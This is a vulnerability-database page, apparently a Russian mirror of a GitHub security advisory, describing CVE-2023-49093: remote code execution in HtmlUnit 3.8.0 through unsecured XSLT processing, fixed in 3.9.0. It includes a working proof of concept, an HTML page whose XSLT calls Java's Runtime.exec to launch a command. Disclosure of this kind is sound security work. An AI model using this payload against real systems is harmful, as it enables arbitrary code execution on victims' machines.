Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-37vq-hr2f-g7h7

Опубликовано: 04 дек. 2023
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL

Summary

HtmlUnit 3.8.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage

Details

Vulnerability code location: org.htmlunit.activex.javascript.msxml.XSLProcessor#transform(org.htmlunit.activex.javascript.msxml.XMLDOMNode)

The reason for the vulnerability is that it was not enabled FEATURE_SECURE_PROCESSING for the XSLT processor

PoC

pom.xml:

<dependency> <groupId>org.htmlunit</groupId> <artifactId>htmlunit</artifactId> <version>3.8.0</version> </dependency>

code:

WebClient webClient = new WebClient(BrowserVersion.INTERNET_EXPLORER); HtmlPage page = webClient.getPage("http://127.0.0.1:8080/test.html"); System.out.println(page.asNormalizedText());

test.html:

<script> var xslt = new ActiveXObject("Msxml2.XSLTemplate.6.0"); var xslDoc = new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0"); var xslProc; xslDoc.async = false; xslDoc.loadXML(`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <span><xsl:value-of select="$processString"/></span> </xsl:template> </xsl:stylesheet>`) if (xslDoc.parseError.errorCode != 0) { var myErr = xslDoc.parseError; document.write("ParseError: "+myErr.reason); } else { xslt.stylesheet = xslDoc; var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0"); xmlDoc.async = false; xmlDoc.loadXML("<s></s>"); if (xmlDoc.parseError.errorCode != 0) { var myErr = xmlDoc.parseError; document.write("Document error: " + myErr.reason); } else { xslProc = xslt.createProcessor(); xslProc.input = xmlDoc; xslProc.transform(); document.write(xslProc.output); } } </script>

Impact

Remote Code Execution

Ссылки

Пакеты

Наименование

org.htmlunit:htmlunit

maven
Затронутые версииВерсия исправления

< 3.9.0

3.9.0

EPSS

Процентиль: 90%
0.05143
Низкий

9.8 Critical

CVSS3

CVE ID

CVE-2023-49093

Дефекты

CWE-94

Связанные уязвимости

ubuntu логотип

CVE-2023-49093

CVSS3: 9.8
ubuntu
около 2 лет назад

HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0

redhat логотип

CVE-2023-49093

CVSS3: 8.8
redhat
около 2 лет назад

HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0

nvd логотип

CVE-2023-49093

CVSS3: 9.8
nvd
около 2 лет назад

HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage. This vulnerability has been patched in version 3.9.0

debian логотип

CVE-2023-49093

CVSS3: 9.8
debian
около 2 лет назад

HtmlUnit is a GUI-less browser for Java programs. HtmlUnit is vulnerab ...

fstec логотип

BDU:2024-00652

CVSS3: 9.8
fstec
около 2 лет назад

Уязвимость браузера без графической оболочки HtmlUnit, связанная с неверным управлением генерацией кода, позволяющая нарушителю выполнить произвольный код

EPSS

Процентиль: 90%
0.05143
Низкий

9.8 Critical

CVSS3

CVE ID

CVE-2023-49093

Дефекты

CWE-94